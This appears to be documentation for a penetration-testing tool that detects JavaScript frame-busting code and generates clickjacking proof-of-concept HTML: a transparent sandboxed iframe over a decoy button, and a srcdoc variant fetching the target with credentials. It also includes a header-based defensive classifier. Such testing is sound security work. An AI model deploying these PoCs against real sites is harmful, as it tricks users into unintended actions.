frame_buster_bypass
Test sandbox attribute bypass for JavaScript frame busters. Generates PoC HTML that uses iframe sandbox='allow-forms' to disable JavaScript execution while allowing form submission for clickjacking.
Instructions
Test sandbox attribute bypass for JavaScript frame busters. Generates PoC HTML that uses iframe sandbox='allow-forms' to disable JavaScript execution (neutralizing frame-busting code) while still allowing form submission for clickjacking. Also checks if the target page contains common frame-busting patterns. Returns: {frame_buster_detected, patterns_found, sandbox_poc_html}. Side effects: Single GET request to detect frame-busting code.
Input Schema
| Name | Required | Description | Default |
|---|---|---|---|
| target_url | Yes | URL that uses JavaScript frame-busting code | |
Implementation Reference
- src/tools/clickjack.ts:128-230 (handler): Handler implementation for the frame_buster_bypass tool, which tests for common frame-busting patterns and generates PoC HTML using sandbox attributes.
```typescript
server.tool(
  "frame_buster_bypass",
  "Test sandbox attribute bypass for JavaScript frame busters. Generates PoC HTML that uses iframe sandbox='allow-forms' to disable JavaScript execution (neutralizing frame-busting code) while still allowing form submission for clickjacking. Also checks if the target page contains common frame-busting patterns. Returns: {frame_buster_detected, patterns_found, sandbox_poc_html}. Side effects: Single GET request to detect frame-busting code.",
  {
    target_url: z
      .string()
      .describe("URL that uses JavaScript frame-busting code"),
  },
  async ({ target_url }) => {
    requireTool("curl");

    // Fetch the page to check for frame-busting code
    const res = await runCmd("curl", ["-sk", target_url]);
    const body = res.stdout;

    // Common frame-busting patterns
    const frameBusterPatterns = [
      "if(self !== top)",
      "if (self !== top)",
      "if(top !== self)",
      "if (top !== self)",
      "if(window !== top)",
      "if (window !== top)",
      "if(parent !== window)",
      "top.location = self.location",
      "top.location = location",
      "top.location.href",
      "parent.location",
      "window.top.location",
      "self.location = top.location",
    ];

    const patternsFound: string[] = [];
    for (const pattern of frameBusterPatterns) {
      if (body.includes(pattern)) {
        patternsFound.push(pattern);
      }
    }
    const frameBusterDetected = patternsFound.length > 0;

    // Generate sandbox bypass PoC
    const sandboxPoc = `<!DOCTYPE html>
<html>
<head>
  <title>Frame Buster Bypass PoC</title>
  <style>
    #target_iframe {
      position: relative;
      width: 800px;
      height: 600px;
      opacity: 0.0001;
      z-index: 2;
    }
    #decoy_button {
      position: absolute;
      top: 300px;
      left: 200px;
      z-index: 1;
      padding: 15px 30px;
      font-size: 18px;
      cursor: pointer;
    }
  </style>
</head>
<body>
  <h1>Click below to continue</h1>
  <button id="decoy_button">Continue</button>
  <!-- sandbox="allow-forms" disables JS (kills frame buster) but allows form submission -->
  <iframe id="target_iframe" src="${target_url}" sandbox="allow-forms"></iframe>
</body>
</html>`;

    // Also generate srcdoc variant for navigating within sandbox
    const srcdocPoc = `<!DOCTYPE html>
<html>
<head><title>Sandbox srcdoc Bypass PoC</title></head>
<body>
  <iframe sandbox="allow-forms allow-scripts" srcdoc="
    <script>
      // Fetch the target page inside a sandboxed context
      fetch('${target_url}', {credentials: 'include'})
        .then(r => r.text())
        .then(html => document.body.innerHTML = html);
    </script>
  "></iframe>
</body>
</html>`;

    const result = {
      target_url,
      frame_buster_detected: frameBusterDetected,
      patterns_found: patternsFound,
      sandbox_poc_html: sandboxPoc,
      srcdoc_poc_html: srcdocPoc,
      hint: frameBusterDetected
        ? `Frame-busting code detected (${patternsFound.length} patterns). Sandbox bypass PoC generated.`
        : "No frame-busting code detected. Standard clickjacking PoC may suffice.",
    };

    return {
      content: [{ type: "text", text: JSON.stringify(result, null, 2) }],
    };
  }
);
```
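The sandbox technique only matters for pages whose sole framing defence is script, because `X-Frame-Options` and CSP `frame-ancestors` are enforced by the browser whether or not scripts run. The following added example (not part of the project's code; `classifyFraming`, `frameAncestors` and the sample responses are hypothetical names and constructed data) classifies a response by which defence it relies on, assuming one value per header.

```typescript
// Added example; all names here are hypothetical, not part of src/tools/clickjack.ts.
type FramingVerdict = "header-protected" | "js-frame-buster-only" | "unprotected";

// A few of the script patterns the handler above searches for.
const BUSTER_PATTERNS = ["if (self !== top)", "if (top !== self)", "top.location"];

// Source list of the frame-ancestors directive, or null when the policy has none.
function frameAncestors(csp: string): string[] | null {
  for (const directive of csp.split(";")) {
    const parts = directive.trim().split(/\s+/);
    if ((parts[0] ?? "").toLowerCase() === "frame-ancestors") return parts.slice(1);
  }
  return null;
}

// Assumes one value per header; Content-Security-Policy-Report-Only is not
// enforced by browsers and is deliberately not consulted.
function classifyFraming(headers: Record<string, string>, body: string): FramingVerdict {
  const h: Record<string, string> = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;

  let headerBlocks: boolean;
  const ancestors = frameAncestors(h["content-security-policy"] ?? "");
  if (ancestors !== null) {
    // frame-ancestors takes precedence over X-Frame-Options when both are sent.
    // Restrictive unless the list admits any origin ("*" or a bare scheme such as https:).
    headerBlocks = ancestors.length > 0 &&
      !ancestors.some((s) => s === "*" || /^[a-z][a-z0-9+.-]*:$/i.test(s));
  } else {
    // ALLOW-FROM is obsolete and ignored by current browsers.
    const xfo = (h["x-frame-options"] ?? "").trim().toUpperCase();
    headerBlocks = xfo === "DENY" || xfo === "SAMEORIGIN";
  }
  if (headerBlocks) return "header-protected";
  return BUSTER_PATTERNS.some((p) => body.includes(p)) ? "js-frame-buster-only" : "unprotected";
}

// Constructed sample responses.
const BUSTER_BODY = "<script>if (self !== top) { top.location = self.location; }</script>";
const SAMPLES: Array<[Record<string, string>, string]> = [
  [{}, BUSTER_BODY],
  [{ "X-Frame-Options": "DENY" }, BUSTER_BODY],
  [{ "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'" }, "<p>hi</p>"],
  [{ "X-Frame-Options": "ALLOW-FROM https://partner.example" }, "<p>hi</p>"],
];
for (const [headers, body] of SAMPLES) console.log(classifyFraming(headers, body));
```

A `js-frame-buster-only` verdict marks the pages that need a header-based framing policy added.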